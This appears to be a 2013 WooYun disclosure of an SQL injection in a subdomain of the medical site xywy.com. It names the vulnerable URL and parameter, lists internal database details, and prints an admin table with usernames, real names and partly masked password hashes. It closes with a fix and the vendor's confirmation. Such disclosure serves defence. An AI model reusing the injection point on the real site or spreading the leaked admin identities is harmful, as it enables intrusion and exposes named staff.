当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032416

漏洞标题:寻医问药某分站存在SQL注入漏洞

相关厂商:寻医问药

漏洞作者: 猪猪侠

提交时间:2013-07-26 15:30

修复时间:2013-09-09 15:31

公开时间:2013-09-09 15:31

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-26: 细节已通知厂商并且等待厂商处理中
2013-07-27: 厂商已经确认,细节仅向厂商公开
2013-08-06: 细节向核心白帽子及相关领域专家公开
2013-08-16: 细节向普通白帽子公开
2013-08-26: 细节向实习白帽子公开
2013-09-09: 细节向公众公开

简要描述:

某分站存在SQL注入漏洞,可直接爆出管理员信息

详细说明:

注入点:
http://z.xywy.com/doc/plus.php?type=appoint&noregist=1&eid=153478
注入信息:

Host IP:		121.11.92.162
Web Server: nginx
DB Server: MySQL >=5
Resp. Time(avg): 195 ms
Current User: [email protected]
Sql Version: 5.0.92-log
Current DB: expert
System User: [email protected]
Host Name: fenzhen-db
Installation dir: /usr/local/mysql-5.0.92/
DB User: 'fzread'@'192.168.0.11'
Data Bases: information_schema
expert
test

漏洞证明:

admin_user_id	admin_group_id	username	passwd	name	createtime	memo	type
1 1 zhouhl125827 74f358****170c802135 李为为 2013-03-07 17:54:29 0
4 4 zhuanj 670b1472****9902aecba 专家 2012-10-09 10:27:26 0
5 1 zzq ae64520acc****7eb9af 张志强 2012-03-01 14:14:19 0
23 2 mubei 7af0bc89****774f0967 穆蓓 2012-03-01 16:01:00 0
25 1 wangyun e3ceb58****1fdaad01 王云 2012-10-09 14:58:28 0
27 16 zhangfuhua e10adc3****a59abbe56 张富华 2013-05-30 11:06:42 0
38 1 likunsheng 李坤省 2012-10-09 10:29:56 0
62 5 穆蓓 e10adc394****9abbe56 穆蓓 2012-05-22 11:11:49 0
84 9 yqlj e10adc394****59abbe56 友情链接 2012-09-11 10:21:50 0
92 1 liuh 332935698****b0e48ee 刘绘 2012-06-13 11:15:47 0
94 1 wangshaoping 15bc9e*******349abbc 王少平 2013-07-24 11:18:07 0

修复方案:

# 客户端传入参数强制类型转换

版权声明:转载请注明来源 猪猪侠@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-27 09:27

厂商回复:

感谢 已提交BUG

最新状态:

暂无